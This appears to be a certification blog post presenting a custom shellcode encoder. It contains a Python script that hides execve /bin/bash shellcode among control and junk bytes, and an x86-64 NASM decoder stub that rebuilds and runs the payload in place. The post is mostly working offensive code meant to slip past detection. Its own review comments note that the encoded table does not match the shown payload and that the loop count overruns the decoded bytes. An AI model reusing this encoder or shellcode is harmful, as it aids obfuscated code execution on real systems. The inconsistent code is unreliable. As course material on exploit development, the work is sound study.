How the encoder works:
Get a random number between 1 and 3 (link to the Python encoder script)
After adding the control number to the shellcode, add the junk bytes
Example:
-------------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
-------------------------------------------------------------------------
G - good byte (an original shellcode byte)
C - control number; tells the decoder how many junk bytes to skip
J - Junk bytes
#!/usr/bin/python from random import randint #30 bytes #shellcode - execve stack version def get_random(ident): if ident == 'number': return randint(1,3) elif ident == 'char': return randint(65,122)#only [a-z[]\^_`A-Z] shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") encoded = "" #end = "\\xf0\\x0d" for x in bytearray(shellcode): encoded += '\\x%02x' % x random = get_random('number') encoded += '\\x%02x' % random for i in range(random-1): encoded += '\\x%02x' % get_random('char') #encoded += end #probably we will need it for correct jump print encoded print print encoded.replace("\\x", ",0x")[1:] print 'Initial len: %d, encoded len: %d' % (len(shellcode), len(encoded)/4)
Decoder.nasm
; ----------------------------------------------------------------------
; Decoder stub for the "control byte + junk" encoding described above.
; Assembler: NASM (Intel syntax). Target: Linux x86-64, standalone
; _start entry (no C ABI in play, so callee-saved registers are not
; preserved).
;
; Encoded table (label `shelcode`, 84 bytes, 30 of them original):
;   G C [J ...] G C [J ...] ...
;   G = original byte, C = distance from C to the next G (1..3),
;   J = filler bytes skipped by following C.
; The loop below rewrites the table in place: recovered bytes are stored
; through rdx starting at the table's first byte, then `call rsi` runs
; them. Since the table lives in .text and is written at run time, this
; only works when the text segment is mapped writable (self-modifying
; code; a W^X-enforcing loader will fault on the first store).
;
; NOTE(review): the original bytes in this table end in 0f 05 (syscall),
; while the Python listing above encodes a 32-bit payload ending in
; cd 80 — the table appears to have been produced from a different,
; 64-bit, input than the one shown.
;
; Register roles inside `restore`:
;   rdi = address of the current control byte C
;   rdx = write position for the next recovered byte
;   rcx = remaining iterations (decremented by `loop`)
;   rax = distance, then address of the next original byte
;   rbx = value of that byte (bl)
; ----------------------------------------------------------------------
section .text
global _start

_start:
        jmp short end                   ; jmp/call/pop: `end` pushes the table address

decoder:
        pop rsi                         ; rsi = address of `shelcode` (return addr pushed by `call decoder`)
        push rsi                        ; keep a copy for the final `call rsi`
        mov rdx, rsi                    ; rdx = write pointer, starts at the table's first byte
        mov rdi, rsi                    ; rdi = read pointer
        inc rsi                         ; NOTE(review): rsi is not read again before `pop rsi` below, so this has no effect; the original comment ("point to the first dest byte") suggests the write pointer rdx was meant
        inc rdi                         ; rdi -> first control byte (table[1])
        push byte 0x53
        pop rcx                         ; rcx = 83 iterations. NOTE(review): 83 is the table length (84) minus one, not the count of original bytes (30), so later iterations read and write beyond the recovered payload — confirm intended

restore:
        xor rax, rax                    ; rax = 0 so the byte loaded into al is zero-extended
        xor rbx, rbx
        mov al, byte [rdi]              ; al = control byte (distance to the next original byte)
        add rax, rdi                    ; rax = address of the next original byte
        mov bl, byte [rax]              ; bl = that byte
        mov byte [rdx], bl              ; store it at the write position (in place)
        mov rdi, rax                    ; rdi = address of the byte just copied
        inc rdi                         ; ... + 1 = its control byte
        inc rdx                         ; advance the write position
        loop restore                    ; rcx--, repeat while nonzero

        pop rsi                         ; rsi = table start saved above
        call rsi                        ; execute the decoded bytes

end:
        call decoder                    ; pushes the address of `shelcode` as the return address

shelcode: db 0x48,0x01,0x31,0x01,0xc0,0x01,0x50,0x03,0x69,0x5b,0x48,0x01,0xbb,0x03,0x7a,0x4d,0x2f,0x03,0x60,0x49,0x62,0x01,0x69,0x01,0x6e,0x01,0x2f,0x02,0x58,0x2f,0x02,0x76,0x73,0x02,0x7a,0x68,0x01,0x53,0x03,0x71,0x62,0x48,0x01,0x89,0x02,0x7a,0xe7,0x01,0x50,0x03,0x6d,0x51,0x48,0x02,0x42,0x89,0x01,0xe2,0x02,0x51,0x57,0x03,0x71,0x59,0x48,0x02,0x54,0x89,0x01,0xe6,0x03,0x46,0x6c,0xb0,0x03,0x4b,0x61,0x3b,0x01,0x0f,0x02,0x71,0x05,0x01   ; encoded table: 84 bytes (G/C/J layout, see header)
This blog post has been created to complete the requirements of the SecurityTube Linux Assembly Expert certification: